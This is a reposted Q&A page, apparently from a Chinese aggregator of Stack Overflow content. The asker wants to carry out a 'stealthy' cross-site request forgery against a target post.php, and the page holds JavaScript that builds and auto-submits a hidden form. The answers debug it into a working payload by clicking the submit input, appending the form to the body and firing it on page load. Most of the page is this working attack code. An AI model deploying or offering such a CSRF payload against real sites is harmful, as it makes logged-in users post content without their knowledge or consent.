您的位置: 首页  >  技术问答  >  无法在使用Java Script创建的表单中设置提交类型输入

无法在使用Java Script创建的表单中设置提交类型输入

分类: 技术问答 2022-02-25 09:21:34

无法在使用Java Script创建的表单中设置提交类型输入

问题描述:

I am working on a project where I have to carryout CSRF on a web page. So when the user is logged in and when he clicks on my webpage, I have to post with his username(derived from the cookie) .

I tried creating my own form using the following code , So that when the user clicks my webpage, this form will post into post.php(target webpage)

<html>
<script language="javascript">

  function blah() {
    alert();
  var theForm, newInput1, newInput2, newInput3;
  var bla = "Aaada";
  var bla2 ="POST";
  // Start by creating a <form>
  theForm = document.createElement("form");
  theForm.action = "http://targeturl/post.php";
  theForm.method = "post";

  newInput1 = document.createElement("input");
  newInput1.type = "text";
  newInput1.name = "username";
  newInput1.value = bla;

  newInput2 = document.createElement("textarea");
  newInput2.name = "message";
  newInput2.value = bla;
    newInput2.id = "message";

  newInput3 = document.createElement("input");
  newInput3.type = "submit";
  newInput3.name = "post_submit";
  newInput3.value = bla2;
  newInput3.id = "post_submit";

  theForm.appendChild(newInput3);
  theForm.appendChild(newInput2);
  theForm.appendChild(newInput1); 
  theForm.submit();

  }
  blah();
</script>
</html>

Title, Message and Submit button are the three inputs in the target form. When I try running this form, the submit button alone is not set. I am not able to understand why. I tried an actual form in html (with ) and posted it to the target URL, it works .

But since I have to be stealthy, I have to manually build the form , like the code I have posted. I tried all posssibilites and I am not able to nail the actual reason why this variable is not setting.

PS:

 if (isset($_POST['post_submit'])) {

is the check in target page

and below id the target form :

<form method="post" action="post.php">
            Title: <input type="text" name="title" maxlength="50"/>
            <br />
            <br />
            Posting:
            <br />
            <br />
            <textarea name="message" cols="120" rows="10" id="message"></textarea>
            <br />
            <br />
            <input name="post_submit" type="submit" id="post_submit" value="POST" />
            </form>

(It posts to itself, I have not included the remaining code of target)

Any help would be appreciated Thanks

If you trigger the click event instead of the submit event, you'll get the submit button as well, so replace

theForm.submit();

with

newInput3.click();

add document.body.appendChild(theForm); in java script before submit and enclose your function call as :

window.onload = function() {
    blah();
}

else you will get document.body is null error in js

相关推荐